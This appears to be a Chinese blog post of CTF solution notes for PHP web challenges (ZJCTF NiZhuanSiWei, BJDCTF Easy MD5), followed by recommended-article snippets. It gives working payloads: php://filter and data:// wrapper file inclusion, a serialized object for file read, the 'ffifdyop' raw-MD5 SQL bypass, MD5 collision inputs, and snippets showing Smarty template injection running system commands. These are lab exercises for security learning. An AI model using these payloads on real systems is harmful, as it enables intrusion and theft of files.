CTF做题笔记10

最新推荐文章于 2025-12-29 10:06:20 发布
原创 最新推荐文章于 2025-12-29 10:06:20 发布 · 422 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #学习 #网络安全

本文介绍了多个CTF(Capture The Flag)挑战,涉及PHP源码解析漏洞和安全机制。首先展示了一个名为NiZhuanSiWei的挑战,其中包含了base64编码和文件包含漏洞。接着,讨论了类 Flag 的使用,通过序列化来触发文件读取。最后,提到了一个条件判断下的隐写术,用于隐藏flag。文章还涵盖了数据库查询与密码验证的MD5用法,以及参数比较与安全防护的实践。

[ZJCTF 2019]NiZhuanSiWei

?text=data://text/pain,welcome%20to%20the%20zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php


welcome to the zjctf

PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo=

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>  

<?php

class Flag
{  //flag.php  
    public $file;
    public function __tostring()
    {
        if (isset($this->file)) {
            echo file_get_contents($this->file);
            echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}

$a = new Flag();
$a->file = "flag.php";
echo serialize($a);
?>
// O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

?text=data://text/pain,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

<!--?php

if(2===3){  
	return ("flag{4fa36ffa-92b8-4074-8f79-398074f0cf6d}");
}

?-->

[BJDCTF2020]Easy MD5

select * from 'admin' where password=md5($pass,true)

?password=ffifdyop

param1[]=QNKCDZO&param2[]=s155964671a

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
} flag{dfbfa6e9-60e7-40f6-b649-72bafca9fea9}
PHP渗透测试题目笔记
Zeker62的博客
02-10 5940
最简单反序列化漏洞陷阱题 PHP反序列化漏洞PHP魔术方法执行顺序CTFHub-2020网鼎杯AreUSerialz攻防世界:unserialize3题目解析攻防世界:PHP2 最简单反序列化漏洞 简单实例,如下是一串简单的PHP代码,index.php里面包含了flag.php 这个文件 <?php // 关闭错误报告 error_reporting(0); include "flag.php"; $key="020202"; $str=$_GET['str']; if(unserializ
CTF做题笔记13
Forever_Han13的博客
05-01 418
CISCN2019 华北赛区 Day1 Web1 Dropbox <!--phar--> <?php class User { public $db; } class File{ public $filename; } class FileList{ private $files; public function __construct($path) { $file = new File(); $file-&gt
ctf刷题和一些比赛wp
m0_73693218的博客
11-23 3089
萌新的ctf刷题日记,文章可能会有大量错误,欢迎各位大佬指教
ctfshow web入门 SSRF(超详解)
qq_50589021的博客
09-08 8715
前言 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) https://ctf-wiki.org/web/ssrf/ https://www.freebuf.com/articles/web/260806.html web351 <?php error_reporting(0)
BugkuCTF-web-变量1 writeup
会下雪的晴天
07-06 2485
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 个人收获:PHP echo(var_dump("$GLOBALS"););//以数组方式输出超全局变量数组内的所有元素 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 题目描述 解题链接:http...
ctf做题笔记
awonderfulrty的博客
11-03 515
切记:当一个错误没有发现时,及时换另外的方法!!!!1.十六进制查看2.stegsolve java文件查看3.zsteg可以检测PNG和BMP图片里的隐写数据(kali中)4.图片中包含隐藏文件,使用binwalk分离(若出现vmdk文件,可用7z解压5.修改图片尺寸。
CTF做题笔记
qq_74303907的博客
01-17 777
3.解法1:可以使用0e开头的数字进行传递参数,因为php将0e开头的数字转化为0,故此时MD5值相等,而两个变量值不相等。首先发现smarty模板,构造'{}'/'{'上传,如果报错,则smarty模板注入。构造data={if system('ls /')}{/if} *显示数据库目录。构造data={if system('cat /目录名')}{/if}使用'{}'表示一个JSON对象,键和值之间使用冒号:分隔。在调试器中打开js脚本,寻找重要函数,修改在控制器中。文件上传绕过: 1.大小写绕过。
新手的CTF做题笔记(慢慢摸索版)
Yilanchia的博客
01-08 375
保护机制:NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。第三个参数 0x200uLL 是要读取的字节数,0x200 是一个十六进制数,表示 512 字节,uLL 表示这是一个无符号长整型常量。因此,这条语句的意思是从标准输入(键盘)读取最多 512 字节的数据,并将读取的数据存储到 buf 指向的缓冲区中。拿到bin/sh的权限。
CTF做题笔记9
Forever_Han13的博客
03-29 3619
[ACTF2020 新生赛]BackupFile $ python3 dirsearch.py -e php,txt,zip,html -u http://d71ec916-0f16-4fea-b5ae-f1d1251aae5e.node4.buuoj.cn:81/ -t 40 --exclude-status 403,401 [19:57:33] 200 - 347B - /index.php.bak ?index.php?key=123 [极客大挑战 2019]PHP /www.zip &
CTF做题笔记8
Forever_Han13的博客
03-27 860
[2022DASCTF]ezpop <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin { public $f1;
CTF做题笔记4
Forever_Han13的博客
12-11 3049
第五题:ics-06 题目:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。 解答:启动场景,获得信息 发现只有左侧报表中心可以点击,看见地址中含有id=1,可以尝试用爆破 用crunch工具生成字典 crunch 1 5 0123456789 >> pass_4.txt 查看字典 more pass_1.txt 运用BurpSuite加载字典进行爆破,发现id=2333响应长度不一样 获得flag [外链图片转存失败,源站可能有防盗
CTF Show MISC做题笔记
lakeside1的博客
06-08 1054
ctf show MISC的做题笔记
攻防世界ctf题目easyupload做题笔记
qq_56426046的博客
08-27 5614
攻防世界ctf题目easyupload做题笔记
buuctf misc做题笔记
lakeside1的博客
03-01 1052
buuctf靶场做题笔记
Web安全之SQL注入-CSRF-XSS
最新发布
AI大模型/Python/Java/MySQL技术栈,快来和我一起学习吧 ~
12-29 667
攻击者通过在用户输入中嵌入恶意 SQL 片段,绕过应用逻辑,直接操作数据库。 示例(危险代码): → 可导致:数据泄露、删除表、提权、远程命令执行(如 PostgreSQL 的 COPY TO)攻击者诱导已登录用户访问恶意网站,该网站自动向目标站点(如银行)发起带 Cookie 的请求(如转账),利用用户身份执行非意愿操作。 前提:用户已登录目标站 + 请求无二次验证。攻击者将恶意脚本(JavaScript)注入网页,当其他用户浏览时执行,窃取 Cookie、会话、钓鱼等。 分类:示例:
计算机网络 (郑烇) 8 网络安全
qq_44845100的博客
12-28 117
【小迪安全web安全|渗透测试|网络安全|SRC挖掘|学习笔记|2021|
weixin_45635831的博客
12-25 627
批量挖掘流程:FOFA收集目标(50万+域名)xray批量扫描(万分之一命中率)人工验证漏洞真实性提交漏洞平台源码审计优势:能深度分析算法逻辑和安全机制黑盒测试要点:常规漏洞扫描JS接口探测三方组件分析经济因素考量:部分售卖系统可能需要购买授权才能获取测试权限开发语言特征:JAVA开发系统常将核心部分封装到dll或jar文件中反编译工具:使用dnSpy等工具对编译文件进行反编译分析。
AI正在重塑网络安全:自动化渗透测试如何让企业“先攻后防”?
2501_93360277的博客
12-25 1129
而AI智能自动化渗透测试系统,融合前沿人工智能技术与多年实战攻防经验,将复杂的黑客攻击路径高度标准化、流程化,实现从资产发现、漏洞探测、利用验证,到报告生成、溯源分析的。系统内置针对WebLogic、OA系统、物联网、工控设备等高危场景的专项插件,支持“目标盲打”和自定义参数配置,跳过冗余步骤,直击漏洞核心。选择一套专业的AI渗透测试系统,就是为您的数字业务装上“智能雷达”与“自动盾牌”,在攻防对抗中牢牢掌握主动权,筑牢高质量发展的安全基石。全面、准确的资产画像,是构建有效防御体系的第一步。
2天:基础入门-Web应用&架构搭建&漏洞&HTTP数据包&代理服务器|小迪安全笔记|网络安全|
weixin_45635831的博客
12-28 753
26:07。
ctf的USB流量题怎么做
06-07
首先,用户的问题是:“我想了解如何解决...[^1]: 流量隐写与Wireshark使用——ctf公开课笔记记录,强调Wireshark在USB流量处理中的基本操作。 [^4]: 流量分析基础知识学习,提供USB流量处理脚本实例和关键步骤解析。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值